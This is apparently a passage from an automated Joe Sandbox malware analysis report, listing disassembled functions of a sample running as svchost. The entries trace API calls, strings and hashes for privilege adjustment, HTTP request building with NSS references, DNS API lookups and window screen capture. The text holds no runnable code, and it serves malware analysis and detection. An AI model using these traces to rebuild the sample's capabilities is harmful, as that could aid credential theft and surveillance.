                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                              Function 0264EB60 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264EB74
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,0264F9DF,?,?), ref: 0264EBD5
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,0264F9DF,?,?), ref: 0264EC91
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,0264F9DF,?,?,Host,?,?), ref: 0264EDD3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,0264F9DF,?,?,Host,?,?), ref: 0264EE8E
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,0264F9DF,?,?), ref: 0264EE9F
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 0264EED1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                              • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                              • API String ID: 438689982-3158524741
                                                                                                                                                                                                              • Opcode ID: 1300cc6bb8a3510fad3ee6f713e4e17a82667494add29db6be3169437fc8fc1b
                                                                                                                                                                                                              • Instruction ID: f7626bfa3ade41b922b7f93f32ac2b13799ad1fe94804c2f48320bc61f07e3f8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1300cc6bb8a3510fad3ee6f713e4e17a82667494add29db6be3169437fc8fc1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED10831E046169BEF258F68C8807FEB7A6BF45314F48469AE8D6A7340DF32D941CB91
                                                                                                                                                                                                              Function 026592D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 139memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 026592D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265930C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02659338
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265935F
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 02659392
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026593AC
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026593B3
                                                                                                                                                                                                              • memset.MSVCRT ref: 026593C3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 026593CE
                                                                                                                                                                                                              • WSASetLastError.WS2_32(?), ref: 02659414
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                              • String ID: GET $POST
                                                                                                                                                                                                              • API String ID: 1455188016-2494278042
                                                                                                                                                                                                              • Opcode ID: 9b885a8666145212e0b6e130976717d7bba5c07f5c803e42762dc68be305c05d
                                                                                                                                                                                                              • Instruction ID: 0ea70f55cb29f1db9d20ffcd8f879aeec1f471df87b34b052cd88f4d96066995
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b885a8666145212e0b6e130976717d7bba5c07f5c803e42762dc68be305c05d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34413CB1D01218EFDB10DFA8DC84AAEBBF9EF49704F508529E905E7340E734A9018FA5
                                                                                                                                                                                                              Function 026503E0 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,0265092A,00000000,?), ref: 0265040B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265040E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0265092A,00000000,?), ref: 0265041B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265041E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,0265092A,00000000,?), ref: 02650437
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,0265092A,00000000,?), ref: 02650448
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,0265092A,00000000,?), ref: 02650458
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265045B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0265092A,00000000,?), ref: 02650468
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265046B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,0265092A,00000000,?), ref: 0265047B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265047E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0265092A,00000000,?), ref: 0265048B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265048E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2935687291-0
                                                                                                                                                                                                              • Opcode ID: 03fb244b988da087837fd120a0368b6b678558352c584087929fe8ce46053586
                                                                                                                                                                                                              • Instruction ID: fc854187110538065f1b2effac3dafb18cfbbb153eacc7bba008db8c3e17a4b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03fb244b988da087837fd120a0368b6b678558352c584087929fe8ce46053586
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31317071A42220ABDB209F71AD88B5F7F9CEF88724F558515ED09D7240DB70C490CAA1
                                                                                                                                                                                                              Function 00401B20 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 66memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • EntryPoint.SVCHOST(00000000), ref: 00401BB0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateEntryHandleHeaderImageLockModulePointPointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3282329762-905597979
                                                                                                                                                                                                              • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                              Function 02646350 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02646350
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 0264635A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75777390), ref: 0264636A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02646383
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 0264639F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 026463BB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 026463D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                              • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                              • API String ID: 2466897691-3547598143
                                                                                                                                                                                                              • Opcode ID: 62ddb0fbf2b9dab5eb86777530afcf91b8bce17b9f7a8a5c981c2e6d10d31a50
                                                                                                                                                                                                              • Instruction ID: 132705f727ae5375e4f8bfd608641e6748f911209dc0fad33c01702d96abc4a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62ddb0fbf2b9dab5eb86777530afcf91b8bce17b9f7a8a5c981c2e6d10d31a50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88016D717C132532FB2232729D46F5F364D8F42E49B461314B893F1140DF94D91188B9
                                                                                                                                                                                                              Function 0264F870 Relevance: 20.1, APIs: 16, Instructions: 76memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0264FB54,?), ref: 0264F88F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F892
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264FB54,?), ref: 0264F89B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F89E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,0264FB54,?), ref: 0264F8B1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8B4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0264FB54,?), ref: 0264F8BD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8C0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0264FB54,?), ref: 0264F8D3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8D6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264FB54,?), ref: 0264F8DF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8E2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,0264FB54,?), ref: 0264F8F5
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8F8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0264FB54,?), ref: 0264F901
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F904
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 53f7d69d4c05f498dd04b8fd5852f38c1dd84e4675cdf5ead01802ede5c691c2
                                                                                                                                                                                                              • Instruction ID: 980f6e15c26c6486969961e756872c5a62188625e3aa2b66eb1b6f6b936c37db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53f7d69d4c05f498dd04b8fd5852f38c1dd84e4675cdf5ead01802ede5c691c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26110735A40355BBDB209AB68C8CF0B7E7CEF85B65F25451AB9099B280DE70D440C9B1
                                                                                                                                                                                                              Function 0264C950 Relevance: 19.6, APIs: 13, Instructions: 116windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 0264C96D
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 0264C97C
                                                                                                                                                                                                                • Part of subcall function 0264DCE0: GetClassNameA.USER32(?,?,00000101), ref: 0264DCF6
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0264C9B9
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 0264C9C2
                                                                                                                                                                                                              • PrintWindow.USER32(00000000,?,00000000), ref: 0264C9D5
                                                                                                                                                                                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?), ref: 0264C9FB
                                                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 0264CA11
                                                                                                                                                                                                              • GetWindowRgn.USER32(00000000,00000000), ref: 0264CA1B
                                                                                                                                                                                                              • OffsetRgn.GDI32(00000000,?,?), ref: 0264CA35
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 0264CA40
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0264CA69
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 0264CA72
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0264CA75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3597830993-0
                                                                                                                                                                                                              • Opcode ID: 380876824799f2485b7cc5ade202e280749ea94c234f775783b8cf16015fa0ec
                                                                                                                                                                                                              • Instruction ID: c5a399a5ac4a2ba409800b4556527983fa481e00b58cebbfba69e07a722e4c22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 380876824799f2485b7cc5ade202e280749ea94c234f775783b8cf16015fa0ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B319071A81204BFDB14DB64DC89FBF7BBCEF85710F515609FA42A2280DB70A891CA65
                                                                                                                                                                                                              Function 0266E214 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 0266E265
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0266E281
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 0266E29B
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0266E2B1
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0266E2DC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 0266E302
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0266E375
                                                                                                                                                                                                              • free.MSVCRT ref: 0266E40A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %02d/%02d/%04d %02d:%02d, xrefs: 0266E2D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                              • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                              • API String ID: 3846129198-4051342895
                                                                                                                                                                                                              • Opcode ID: a8ca126d0deca41cd5519400b5cc1b37f84ddf875b792fb852dc13467dfb06a2
                                                                                                                                                                                                              • Instruction ID: 80ca9cfdd61339becfc764f58e18770fb0c638de2a14b15d9eb607ef2afe603a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8ca126d0deca41cd5519400b5cc1b37f84ddf875b792fb852dc13467dfb06a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD610575A00609AFCB10CF78DC58AFEBBF5EF49310F044699F946A7241EB32A555CBA0
                                                                                                                                                                                                              Function 0265CB80 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 45sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 0265CBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265CBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265CBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265CBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0265CBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265CBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A689,BSS), ref: 0265CC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265CC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 8A99A689$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-1856957256
                                                                                                                                                                                                              • Opcode ID: 943d24fac2712608406510ab67ee9c13492aa610d0cf45bbe7528117e4469740
                                                                                                                                                                                                              • Instruction ID: 169991c1d654b0076a6d51298cc23041a0aac9294e925776672357f5f9fb5484
